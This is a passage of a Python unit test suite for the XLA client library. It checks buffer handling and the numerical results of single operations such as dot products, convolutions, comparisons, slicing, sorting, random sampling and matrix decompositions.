arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)
@unittest.skipIf(cloud_tpu, "not implemented")
def testClone(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
z = y.clone()
self.assertNotEqual(id(x), id(y))
np.testing.assert_array_equal(y.to_py(), z.to_py())
self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())
@unittest.skipIf(cloud_tpu, "not implemented")
def testJaxAttributesHaveCorrectDefaults(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
self.assertIsNone(y.aval)
self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool_, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = x.view(dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
ops.AllToAll(ops.Constant(c, lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=[lhs])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(ops.Constant(c, lhs))
self._ExecuteAndCompareExact(c, expected=[lhs])
def testReplicaId(self):
c = self._NewComputation()
_ = ops.ReplicaId(c)
self._ExecuteAndCompareExact(c, expected=[0])
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
ops.CrossReplicaSum(
ops.Constant(c, lhs), xla_client.make_replica_groups([[0]]))
self._ExecuteAndCompareExact(c, expected=[lhs])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixVector(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0], [20.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
# TODO(phawkins): np.dot implementation doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDotMatrixMatrix(self, dtype):
c = self._NewComputation()
lhs = np.array([[2.0, 3.0], [4.0, 5.0]], dtype=dtype)
rhs = np.array([[10.0, 20.0], [100.0, 200.0]], dtype=dtype)
ops.Dot(ops.Constant(c, lhs), ops.Constant(c, rhs))
self._ExecuteAndCompareClose(c, expected=[np.dot(lhs, rhs)])
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
ops.DotGeneral(
ops.Constant(c, lhs), ops.Constant(c, rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.make_dot_dimension_numbers(
(([2], [1]), ([0], [0])))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
ops.DotGeneral(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=[np.matmul(lhs, rhs)], rtol=1e-6)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
ops.ConvGeneralDilated(
ops.Constant(c, lhs),
ops.Constant(c, rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NHWC", "OIHW", "CWNH"), 2)
ops.ConvGeneralDilated(
ops.Constant(c, np.transpose(lhs,
(0, 2, 3, 1))), ops.Constant(c, rhs),
strides, pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(
c, expected=[np.transpose(result, (1, 3, 0, 2))])
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = xla_client.make_convolution_dimension_numbers(
("NCHW", "OIHW", "NCHW"), 2)
feature_group_count = 2
ops.ConvGeneralDilated(
ops.Constant(c, lhs), ops.Constant(c, rhs), strides, pads,
lhs_dilation, rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=[result])
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
ops.Not(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[~arr])
def testPopulationCount(self):
c = self._NewComputation()
arr = NumpyArrayS32([3, 0, 1])
ops.PopulationCount(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.array([2, 0, 1])])
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
ops.Clz(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[[17, 3]])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Exp(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.exp(arr)])
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Expm1(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.expm1(arr)])
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Round(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.round(arr)])
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log(arr)])
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Log1p(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.log1p(arr)])
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Neg(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[-arr])
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Floor(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.floor(arr)])
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
ops.Ceil(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.ceil(arr)])
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
ops.Abs(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.abs(arr)])
def testTanhF32(self):
c = self._NewComputation()
arr = NumpyArrayF32([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)])
def testTanhF64(self):
if self.backend.platform == "tpu":
self.skipTest("TPU doesn't support 64bit tanh")
c = self._NewComputation()
arr = NumpyArrayF64([-0.2, 3.3, 12.1, 0.1, 0.0001])
ops.Tanh(ops.Constant(c, arr))
self._ExecuteAndCompareClose(c, expected=[np.tanh(arr)], rtol=1e-12)
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
ops.Transpose(ops.Constant(c, array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=[expected])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
ops.Eq(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
def testNe(self):
c = self._NewComputation()
ops.Ne(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4])),
ops.Constant(c, NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, True]])
ops.Ne(
ops.Constant(c, NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
ops.Constant(c, NumpyArrayF32([2.0, -0.0, 1.0,
float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose,
c, (),
expected=[[True, False, True, True]])
def testGt(self):
c = self._NewComputation()
ops.Gt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, True, True, False, False]])
def testGe(self):
c = self._NewComputation()
ops.Ge(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, True, True, False, False]])
def testLt(self):
c = self._NewComputation()
ops.Lt(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[False, False, False, True, True]])
def testLe(self):
c = self._NewComputation()
ops.Le(
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 9])),
ops.Constant(c, NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(
c, expected=[[True, False, False, True, True]])
def testMax(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 2.0, 3.0, 7.0, 12.0]])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 3, 3], [4, 5, 6], [7, 8, 9]]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
ops.Max(
ops.Constant(c, NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(
c, expected=[[[3, 4, 5], [4, 5, 6], [7, 8, 9]]])
def testMin(self):
c = self._NewComputation()
ops.Min(
ops.Constant(c, NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
ops.Constant(c, NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[[1.0, 0.0, 2.0, 4.0, 9.0]])
def testPad(self):
c = self._NewComputation()
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)),
xla_client.make_padding_config([(1, 2, 1), (0, 1, 0)]))
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
ops.Pad(
ops.Constant(c, NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
ops.Constant(c, NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]]])
def testReshape(self):
c = self._NewComputation()
ops.Reshape(
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [4, 5, 6]]])
def testCollapse(self):
c = self._NewComputation()
ops.Collapse(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3, 4], [5, 6, 7, 8]]])
def testRev(self):
c = self._NewComputation()
ops.Rev(
ops.Constant(c, NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[[6, 5], [8, 7]], [[2, 1], [4, 3]]]])
def testReducePrecision(self):
c = self._NewComputation()
ops.ReducePrecision(
ops.Constant(c, NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[[float.fromhex("0x1.32p-3")]])
def testClampF32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayF32(-1)),
ops.Constant(c, NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testClampS32(self):
c = self._NewComputation()
ops.Clamp(
ops.Constant(c, NumpyArrayS32(-1)),
ops.Constant(c, NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
ops.Constant(c, NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[[-1, -1, 0, 1, 2, 2]])
def testSelect(self):
c = self._NewComputation()
ops.Select(
ops.Constant(c, NumpyArrayBool([True, False, False, True, False])),
ops.Constant(c, NumpyArrayS32([1, 2, 3, 4, 5])),
ops.Constant(c, NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[[1, -2, -3, 4, -5]])
def testSlice(self):
c = self._NewComputation()
ops.Slice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[1, 0], [3, 2], [1, 1])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testSliceInDim(self):
c = self._NewComputation()
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[[2], [5], [8]]])
ops.SliceInDim(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[[1, 2, 3], [7, 8, 9]]])
def testDynamicSlice(self):
c = self._NewComputation()
ops.DynamicSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
[ops.Constant(c, NumpyArrayS32([1, 0]))], [2, 2])
self._ExecuteAndCompareExact(c, expected=[[[4, 5], [7, 8]]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
ops.DynamicUpdateSlice(
ops.Constant(c, NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
ops.Constant(c, NumpyArrayS32([[1, 2], [3, 4]])),
[ops.Constant(c, NumpyArrayS32([1, 1]))])
self._ExecuteAndCompareExact(
c, expected=[[[1, 2, 3], [4, 1, 2], [7, 3, 4]]])
def testTuple(self):
c = self._NewComputation()
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
])
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 3)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
ops.GetTupleElement(
ops.Tuple(c, [
ops.Constant(c, np.int32(42)),
ops.Constant(c, NumpyArrayF32([1.0, 2.0])),
ops.Constant(c, NumpyArrayBool([True, False, False, True]))
]), 1)
self._ExecuteAndCompareClose(c, expected=[[1.0, 2.0]])
def testBroadcast(self):
c = self._NewComputation()
ops.Broadcast(
ops.Constant(c, NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]]])
def testBroadcastInDim(self):
c = self._NewComputation()
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[[1, 1], [2, 2]]])
ops.BroadcastInDim(ops.Constant(c, NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[[1, 2], [1, 2]]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
ops.RngNormal(
ops.Constant(c, NumpyArrayF32(0.)),
ops.Constant(c, NumpyArrayF32(1.)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape and uniqueness
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayF32(lo)),
ops.Constant(c, NumpyArrayF32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.F32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, uniqueness, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertLen(np.unique(result[0]), np.prod(shape))
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
ops.RngUniform(
ops.Constant(c, NumpyArrayS32(lo)),
ops.Constant(c, NumpyArrayS32(hi)),
shape=xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
shape))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
# since the result is random, we just check shape, integrality, and range
self.assertLen(result, 1)
self.assertEqual(result[0].shape, shape)
self.assertEqual(result[0].dtype, np.int32)
self.assertTrue(np.all(lo <= result[0]))
self.assertTrue(np.all(result[0] < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
ops.Cholesky(ops.Constant(c, np.tril(np.dot(l, l.T))))
self._ExecuteAndCompareClose(c, expected=[l], rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
ops.Sort(c, [ops.Constant(c, keys)], is_stable=True)
self._ExecuteAndCompareClose(
c,
expected=[np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32)])
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(c, (ops.Constant(c, keys), ops.Constant(c, values)), dimension=0)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
p1 = ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
q1 = ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Or(ops.Lt(p0, q0), ops.And(ops.Eq(p0, q0), ops.Gt(p1, q1)))
comparator = b.build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
ops.Sort(
c, (ops.Constant(c, keys), ops.Constant(c, values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.QR(ops.Constant(c, a), full_matrices=True))
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
ops.Tuple(c, ops.Eigh(ops.Constant(c, a), lower=True))
# TODO(b/129396575): Turn this test back on when it passes without
# fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array([[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166],
[10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
ops.Tuple(c, ops.SVD(ops.Constant(c, a)))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
ops.TriangularSolve(
ops.Constant(c, a_vals),
ops.Constant(c, b_vals),
left_side=False,
lower=True,
transpose_a=ops.TriangularSolveOptions_Transpose.TRANSPOSE,
unit_diagonal=False)
self._ExecuteAndCompareClose(
c,
expected=[
np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32)
